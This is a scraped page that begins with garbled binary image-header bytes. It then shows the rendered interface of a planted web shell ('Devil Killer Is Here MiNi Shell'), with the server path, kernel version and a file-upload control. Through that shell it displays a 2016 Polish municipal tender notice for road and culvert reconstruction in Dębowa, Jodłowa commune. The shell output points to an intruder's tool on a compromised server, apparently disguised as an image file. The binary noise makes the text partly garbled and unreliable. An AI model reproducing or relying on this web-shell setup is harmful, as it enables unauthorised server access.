JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160602/66465-N-2016.html

<p class="kh_header"><b>Jodłowa: Przebudowa ciągu dróg gminnych: Dzioły do Łukasika o nr ewid. 862/1 w km 0+028 0+918 oraz Do Raka o nr ewid. 70/1, 70/2, 71/1, 72/1, 74/10, 74/13, 79/1, 90/1, 86/1, 85/1, 863, 126/1, 136/1, 864, 132/1, 135/1, 133/2, 130/5 w km 0+000 - 1+003 wraz z przebudową przepustu w km 0+220 w m. Dębowa</b><br>
<b>Numer ogłoszenia: 66465 - 2016; data zamieszczenia: 02.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jodłowa , Jodłowa 1A, 39-225 Jodłowa, woj. podkarpackie, tel. 14 683 30 53;683 30 46;6302001, faks 14 630 20 02;683 30 44.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ciągu dróg gminnych: Dzioły do Łukasika o nr ewid. 862/1 w km 0+028 0+918 oraz Do Raka o nr ewid. 70/1, 70/2, 71/1, 72/1, 74/10, 74/13, 79/1, 90/1, 86/1, 85/1, 863, 126/1, 136/1, 864, 132/1, 135/1, 133/2, 130/5 w km 0+000 - 1+003 wraz z przebudową przepustu w km 0+220 w m. Dębowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> - Przebudowa drogi gminnej Dzioły do Łukasika w Dębowej obejmuje odcinek o długości 890,00 m, w km 0+028 - 0+918.  Szerokość jezdni  wynosi 2,50 m. Prace należy rozpocząć od obustronnego, mechanicznego ścięcia poboczy o szerokości 0,50 m i średniej grubości 10 cm, z odwiezieniem ścinki na odległość do 1 km. Po mechanicznym wyrównaniu i zagęszczeniu podłoża, na pozostający w najgorszym stanie technicznym końcowym odcinku drogi, usytuowanym w km 0+768 - 0+918 przyjęto  wykonanie podbudowy z gruntu stabilizowanego cementem, w ilości 20 kg/m2 podłoża. Grubość warstwy stabilizacyjnej 12 cm po zagęszczeniu. Następnie  całość istniejącej nawierzchni żwirowej i należy wyprofilować mieszanką tłuczniową o grubości warstwy 15 cm po zagęszczeniu. Na tak przygotowanych konstrukcyjnych warstwach podbudowy, projektowane jest ułożenie dwuwarstwowej nawierzchni z masy mineralno- asfaltowej, grysowo-żwirowej, Standard II; warstwa profilowa (wiążąca) o grubości 3 cm + warstwa ścieralna o grubości 5 cm po zagęszczeniu. Nową nawierzchnię jezdni należy wyprofilować z 2% spadkiem poprzecznym w kierunku lewostronnego rowu odwadniającego. W miejscu  styku początku projektowanej nawierzchni jezdni z istniejącą nawierzchnią bitumiczną, dla zapewnienia właściwych ich połączeń, niezbędne jest wykonanie mechanicznego zacięcia i rozebranie nawierzchni w pasie o szerokości 0,50 m. Po wykonaniu nawierzchni bitumicznej należy wyrównać, wyprofilować i utwardzić mieszanką tłuczniową obustronne pobocza drogowe o szerokości 0,20 m i grubości warstwy 12 cm po zagęszczeniu.. 
- Przebudowa drogi gminnej wewnętrznej niepublicznej Do Raka w miejscowości Dębowa na odcinku o długości 1003,00 m, w km 0+000 - 1+003, z jezdnią o nawierzchni bitumicznej występującą w km 0+000 - 0+836 oraz żwirowo - betonowej w km 0+836 - 1+003. Szerokość jezdni  wynosi 2,50 m. Prace należy rozpocząć od obustronnego, mechanicznego ścięcia poboczy o szerokości 0,50 m i średniej grubości 10 cm, z odwiezieniem ścinki na odległość do 1 km. Oczyszczenia z namułu wymagają istniejące odcinki przydrożnych rowów odwadniających. Przed przystąpieniem do ułożenia nowej nawierzchni bitumicznej odcinek jezdni z nawierzchnią betonowo - żwirową należy wyprofilować mieszanką tłuczniową o grubości warstwy 15 cm po zagęszczeniu. Zniszczoną nawierzchnię bitumiczną pozostałej części drogi po dokładnym mechanicznym wyczyszczeniu i skropieniu asfaltem w ilości 0,5 kg/m2, miejscowo wyrównać mieszanką mineralno - bitumiczną. Na tak przygotowanym  podłożu, projektowane jest ułożenie dwuwarstwowej nawierzchni z masy mineralno- asfaltowej, grysowo-żwirowej, Standard II; przy czym na odcinku występującym w km 0 +000 - 0+836 przyjęto warstwę profilową (wiążącą) o grubości 2 cm + warstwę ścieralną o grubości 4 cm po zagęszczeniu, zaś na odcinku w km 0+836 - 1+003 grubość warstwy profilowej (wiążącej) wynosić będzie 3 cm i warstwy ścieralnej 5 cm po zagęszczeniu. Nową nawierzchnię jezdni należy wyprofilować z 2% spadkiem poprzecznym w kierunku istniejących, przydrożnych rowów odwadniających. W miejscu  styku początku projektowanej nawierzchni jezdni z istniejącą nawierzchnią bitumiczną drogi powiatowej, dla zapewnienia właściwych ich połączeń, niezbędne jest wykonanie mechanicznego zacięcia i rozebranie nawierzchni w pasie o szerokości 3,00 m. Po wykonaniu nawierzchni bitumicznej należy wyrównać, wyprofilować i utwardzić mieszanką tłuczniową obustronne pobocza drogowe o szerokości 0,30 m. Średnia grubość warstwy utwardzającej pobocza, po zagęszczeniu wynosić będzie 6 cm na odcinku w km 0+000 - 0+836 i 8 cm na odcinku usytuowanym w km 0+836 - 1+003.  
- Przebudowa przepustu w km 0+220 drogi gminnej Do Raka w Dębowej   
W ramach planowanej przebudowy przepustu należy wykonać następujące roboty inżynieryjno - budowlane:
- uzupełnienie powstałych wyrw gruntowych w skarpach brzegowych i dnie koryta potoku w obrębie usytuowania przedmiotowego obiektu inżynierskiego
- przebudowa wszystkich zdeformowanych, uszkodzonych i naruszonych betonowych, konstrukcyjnych  elementów przepustu 
- przebudowa zniszczonej nawierzchni bitumicznej wykonanej na obustronnych dojazdach do przepustu oraz jezdni przęsłowej przepustu 
- przebudowa zniszczonych budowli kamiennych zabezpieczających brzegi potoki w bezpośrednim sąsiedztwie przepustu
- przebudowa  umocnień dna koryta  cieku wodnego, wykonanego z narzutu kamiennego
- wymiana zużytych pod względem technicznym i użytkowym stalowych barier mostowych

Na okres prowadzonych   robót  w/w odcinek  drogi  wyłączony  zostanie z  eksploatacji.
Całość robót ziemnych należy wykonywać ściśle z zakresem wynikającym z opracowanej dokumentacji technicznej przebudowy przepustu oraz zgodnie z warunkami technicznymi wykonania i odbioru robót. Podczas wykonywania robót ziemnych nie można doprowadzić do naruszenia warstw gruntu w poziomie posadowienia fundamentów podpor przepustu. Roboty należy wykonywać w okresie bezdeszczowym. 
Na dojazdach przed ułożeniem nawierzchni należy wykonać dwie warstwy konstrukcyjne podbudowy, tj, dolną z kruszywa naturalnego o gr. 30 cm po zagęszczeniu oraz górna z mieszanki tłuczniowej o gr. 15 cm po zagęszczeniu. Przestrzenie pomiędzy tylnymi ścianami przyczółków, a monolitycznie połączonymi z nimi skrzydełkami, należy na całej wysokości zasypać naturalnym kruszywem kamiennym, zwracając uwagę na bardzo dokładne mechaniczne zagęszczenie zasypki.  Na tak przygotowanej podbudowie, na jezdni przepustu i obustronnych dojazdach do obiektu przyjęto ułożenie dwuwarstwowej nawierzchni z masy mineralno- asfaltowej, grysowo-żwirowej, Standard II; tj. warstwy profilowej o grubości 2 cm oraz warstwy ścieralnej o grubości 4 cm po zagęszczeniu.
Brzegi koryta potoku na odcinkach po 5,00 m w górę i dół cieku zostaną zabezpieczone budowlami faszynowo-kamiennymi, wykonanymi z koszy siatkowo - kamiennych o module 1,00 x 0,50, odpowiednio zagłębionych w dnie potoku, na podłożu ze ściółki faszynowej.  Do wykonania koszy należy użyć gruby kamień łamany, przeznaczony do budowy obiektów inżynierskich. Siatkę  o oczkach od 12 x 12 cm do 15 x 15 cm należy wykonać z drutu ocynkowanego o przekroju 4 mm.  Całość wykonanego zabezpieczenia skarp brzegowych  potoku musi być dokładnie ze sobą  powiązana,  zakotwiona i zespolona  z podłożem.  Po wykonaniu projektowanego  wzmocnienia, powstałe wyrwy w  brzegach potoku powstałe w obrębie przepustu  należy uzupełnić ziemią, a powstały nasyp odpowiednio zagęścić i wyprofilować. Dno potoku umocnić grubym narzutem kamiennym.
Wszystkie roboty związane z przebudową dróg i urządzeń odwadniających projektowane są w obrębie istniejącego pasa drogowego, wydzielonego przez linie rozgraniczające drogę. 
W miejscach gdzie występuje kolizja z sieciami teletechnicznymi prace będą prowadzone zgodnie z obowiązującymi uzgodnieniami. 
Planowane roboty inżynieryjno - drogowe należy wykonać zgodnie z obowiązującymi warunkami technicznymi i przepisami BHP. W obrębie wykonywanych robót droga obustronnie musi być prawidłowo oznakowana i odpowiednio zabezpieczona.
Organizacja i zabezpieczenie robót winno spełniać wymogi określone w Rozporządzeniu Ministra Transportu I Gospodarki Morskiej z dnia 10 października 2000 r. w sprawie zarządzania ruchem na drogach (Dz. U. z 1999r. Nr 90,  poz.1006)
Dokładny opis i zakres robót określony został w opisany w SIWZ i jej załącznikach: opisach technicznych, przekrojach, szczegółowej specyfikacji technicznej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust. 1 pkt. 6 U Pzp, stanowiące nie więcej niż 50% wartości zamówienia podstawowego. Ewentualne roboty uzupełniające będą polegały na powtórzeniu tego samego rodzaju robót</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium dla całości przedmiotu zamówienia w wysokości 10000,00 zł /słownie: dziesięć tysięcy zł/</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna że wykonawca spełnia ten warunek jeżeli wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie min 1 robotę budowlaną polegającą na budowie, przebudowie lub remoncie nawierzchni dróg o nawierzchni mineralno - bitumicznej, długości min 800 m i załączy dokumenty potwierdzające (poświadczenia), że te roboty zostały wykonane należycie zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie będzie wymagał potwierdzenia spełniania warunku w zakresie potencjału technicznego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna że wykonawca spełnia warunek posiadania osób zdolnych do wykonania zamówienia, jeżeli dysponuje lub będzie dysponował min 1 osobą posiadającą uprawnienia  budowlane w specjalności drogowej (lub uprawnienia równoważne do powyższych a wydane na podstawie wcześniej obowiązujących przepisów prawa) i aktualny wpis do właściwej izby</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy o spełnieniu warunków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>zamawiający w sposób obiektywny i niedyskryminacyjny określa roboty budowlane których dotyczy obowiązek wskazania w wykazie lub złożenia poświadczeń - roboty których przedmiot jest związany i proporcjonalny do przedmiotu zamówienia tj. polegających na budowie, przebudowie lub remoncie nawierzchni dróg o nawierzchni mineralno - bitumicznej, długości min 800 m i załączy dokumenty potwierdzające (poświadczenia), że te roboty zostały wykonane należycie zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający nie wymaga informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy, kosztorys ofertowy uproszczony, dowód wniesienia wadium, pełnomocnictwo do reprezentacji o ile ofertę składa pełnomocnik</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - udzielona gwarancja - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonanie zmiany  umowy zgodnie z art.144 ustawy w tym także w zakresie postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia następujących warunków:
Warunki istotne, w szczególności
A. zmiana terminu wykonania zamówienia ulegnie przesunięciu w przypadku skrócenia terminu realizacji inwestycji oraz przedłużenia w przypadku wystąpienia opóźnień  wynikających z:
- przestojów i opóźnień zawinionych przez Zamawiającego w szczególności: wstrzymanie realizacji umowy przez Zamawiającego, konieczność wprowadzania zmian w dokumentacji projektowej;
- wstrzymania robót przez inspektora nadzoru inwestorskiego (pisemne) pod warunkiem przyczyn niezawinionych przez Wykonawcę;
- wstrzymanie robót przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę np: dokonanie odkrywki archeologicznej, odkrycie niewybuchu, itp;
- działania siły wyższej (np. strajki generalne lub lokalne) mające bezpośredni wpływ na terminowość wykonania robót lub inne okoliczności niezależne od Wykonawcy lub których wykonawca przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć, jak również inne przeszkody i utrudnienia w wykonywaniu przedmiotu umowy spowodowane przez osoby trzecie;
- niekorzystnych warunków atmosferycznych, potwierdzonych przez IMiGW, uniemożliwiających dochowanie wymogów technicznych i technologicznych tj.: temperatury otoczenia poniżej -5o C utrzymującej się przez minimum 3 dni, ciągłych opadów, trwających minimum trzy dni, przekraczających średnie opady na danym terenie
- warunków geologicznych, terenowych, archeologicznych, wodnych itp., w szczególności: odmienne od przyjętych w dokumentacji warunki geologiczne, odmienne od przyjętych w dokumentacji warunki terenowe, w szczególności istnienie podziemnych sieci, instalacji i urządzeń lub nie zinwentaryzowanych obiektów budowlanych, wystąpienie osuwisk gruntu nie ustalonych w oparciu o dokonane badania geologiczne, wystąpienie innych nie dających się przewidzieć zjawisk geologicznych i hydrologicznych pojawiających się w trakcie budowy
B. zmiany będące następstwem działania organów administracji, w szczególności przekroczenie określonych przez prawo terminów wydawania przez te organy decyzji, zezwoleń, uzgodnień itp. odmowa wydania przez organy administracji wymaganych  decyzji, zezwoleń, uzgodnień lub na skutek błędów w dokumentacji projektowej; konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu, którego konieczności nie przewidziano przy zawieraniu umowy 
C. Zmiany technologiczne  w szczególności:
- konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych lub materiałowych  niż wskazane w dokumentacji projektowej, w sytuacji gdy  nie zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem projektu;
- odmienne niż przyjęte w dokumentacji warunki terenowe w szczególności istnienie podziemnych sieci, instalacji i urządzeń lub nie zinwentaryzowanych obiektów budowlanych skutkujące niemożliwością wykonania  przedmiotu zamówienia przy dotychczasowych założeniach technologicznych lub materiałowych;
- konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.
D. Zmiany wynikające z konieczności poprawiania omyłek i błędów projektowania inwestycji
E. Zmiany dotyczące podwykonawstwa
F. Zmiany zakresu rzeczowego 
- zmniejszenia zakresu rzeczowego w związku z ograniczonymi możliwościami płatniczymi Zamawiającego
- zmniejszenia przedmiotu zamówienia pod warunkiem że z niemożliwych do przewidzenia na etapie planowania inwestycji danych wykonanie całości przedmiotu zamówienia napotyka istotne trudności, których przezwyciężenie wymagałoby poniesienia niewspółmiernie wysokich kosztów, w takim przypadku Wykonawca może żądać wynagrodzenia tylko za wykonaną część umowy.
